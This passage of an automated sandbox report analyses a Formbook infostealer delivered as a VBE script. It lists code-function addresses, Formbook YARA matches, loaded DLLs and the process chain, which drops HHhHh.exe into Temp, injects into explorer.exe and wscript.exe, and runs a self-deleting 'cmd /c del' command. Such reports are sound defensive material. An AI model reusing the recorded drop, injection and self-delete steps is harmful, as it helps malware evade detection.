          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D90F306_2_04D90F30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DB2F286_2_04DB2F28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D9E8F06_2_04D9E8F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D568B86_2_04D568B8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D728406_2_04D72840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D7A8406_2_04D7A840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E3A9A66_2_04E3A9A6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D729A06_2_04D729A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D869626_2_04D86962
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D6EA806_2_04D6EA80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E26BD76_2_04E26BD7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2AB406_2_04E2AB40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D614606_2_04D61460
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2F43F6_2_04E2F43F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E0D5B06_2_04E0D5B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E275716_2_04E27571
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E216CC6_2_04E216CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2F7B06_2_04E2F7B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2F0E06_2_04E2F0E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E270E96_2_04E270E9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D770C06_2_04D770C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E1F0CC6_2_04E1F0CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D7B1B06_2_04D7B1B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E3B16B6_2_04E3B16B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D5F1726_2_04D5F172
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA516C6_2_04DA516C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E112ED6_2_04E112ED
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D8B2C06_2_04D8B2C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D752A06_2_04D752A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DB739A6_2_04DB739A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D5D34C6_2_04D5D34C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2132D6_2_04E2132D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2FCF26_2_04E2FCF2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DE9C326_2_04DE9C32
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D8FDC06_2_04D8FDC0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E27D736_2_04E27D73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D73D406_2_04D73D40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E21D5A6_2_04E21D5A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D79EB06_2_04D79EB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D33FD26_2_04D33FD2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D33FD56_2_04D33FD5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D71F926_2_04D71F92
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2FFB16_2_04E2FFB1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2FF096_2_04E2FF09
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D738E06_2_04D738E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DDD8006_2_04DDD800
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D799506_2_04D79950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D8B9506_2_04D8B950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E059106_2_04E05910
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E1DAC66_2_04E1DAC6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E0DAAC6_2_04E0DAAC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DB5AA06_2_04DB5AA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E27A466_2_04E27A46
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2FA496_2_04E2FA49
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DE3A6C6_2_04DE3A6C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DADBF96_2_04DADBF9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DE5BF06_2_04DE5BF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04D8FB806_2_04D8FB80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04E2FB766_2_04E2FB76
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091E23C6_2_0091E23C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091C3E66_2_0091C3E6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091D5A66_2_0091D5A6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091E7AF6_2_0091E7AF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091D90C6_2_0091D90C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091EB3A6_2_0091EB3A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_00902D906_2_00902D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_00902D886_2_00902D88
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_00909E5B6_2_00909E5B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_00909E606_2_00909E60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_00902FB06_2_00902FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04ADA0366_2_04ADA036
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04ADE5CD6_2_04ADE5CD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04AD2D026_2_04AD2D02
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04AD10826_2_04AD1082
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04AD89126_2_04AD8912
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04ADB2326_2_04ADB232
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04AD5B306_2_04AD5B30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04AD5B326_2_04AD5B32
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04DEF290 appears 105 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04DA5130 appears 57 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04D5B970 appears 275 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04DB7E54 appears 100 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04DDEA12 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: String function: 0128B970 appears 275 times
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: String function: 0131F290 appears 105 times
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: String function: 012E7E54 appears 100 times
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: String function: 0130EA12 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: String function: 012D5130 appears 57 times
          Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: HHhHh.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.csSecurity API names: _0020.SetAccessControl
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.csSecurity API names: _0020.AddAccessRule
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, wjoM4miaX9WrPncB9X.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 2.2.HHhHh.exe.273924c.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 2.2.HHhHh.exe.271a080.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 2.2.HHhHh.exe.5150000.8.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: classification engineClassification label: mal100.troj.evad.winVBE@10/2@12/5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009BB52D FormatMessageW,LocalAlloc,GetLastError,swprintf_s,FormatMessageA,LocalAlloc,sprintf_s,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,SysAllocString,LocalFree,LocalFree,6_2_009BB52D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009C08FD CLSIDFromProgID,CoCreateInstance,6_2_009C08FD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009C6D75 FindResourceExW,LoadResource,6_2_009C6D75
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HHhHh.exe.logJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\HHhHh.exeJump to behavior
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: TNS71092E68UI0.vbeVirustotal: Detection: 16%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeProcess created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\HHhHh.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: wntdll.pdb source: HHhHh.exe, wscript.exe
          Source: Binary string: wscript.pdb source: wscript.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: HHhHh.exe.0.dr, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 2.2.HHhHh.exe.50f0000.7.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
          Source: 2.2.HHhHh.exe.50f0000.7.raw.unpack, PingPong.cs.Net Code: Justy
          Source: 2.2.HHhHh.exe.27064c8.5.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
          Source: 2.2.HHhHh.exe.27064c8.5.raw.unpack, PingPong.cs.Net Code: Justy
          Source: 2.2.HHhHh.exe.26d7bb0.3.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
          Source: 2.2.HHhHh.exe.26d7bb0.3.raw.unpack, PingPong.cs.Net Code: Justy
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.cs.Net Code: IULKWjhlCQ System.Reflection.Assembly.Load(byte[])
          Source: 5.2.explorer.exe.109cf840.0.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 6.2.wscript.exe.527f840.3.raw.unpack, frmMain.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 2_2_051CB286 push ss; iretd 2_2_051CB287
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041E8DF push edi; ret 4_2_0041E8E8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_004169FC push esp; ret 4_2_004169FD
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_00408394 pushfd ; iretd 4_2_00408395
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041D4B5 push eax; ret 4_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_004044B7 push es; ret 4_2_004044BE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041D56C push eax; ret 4_2_0041D572
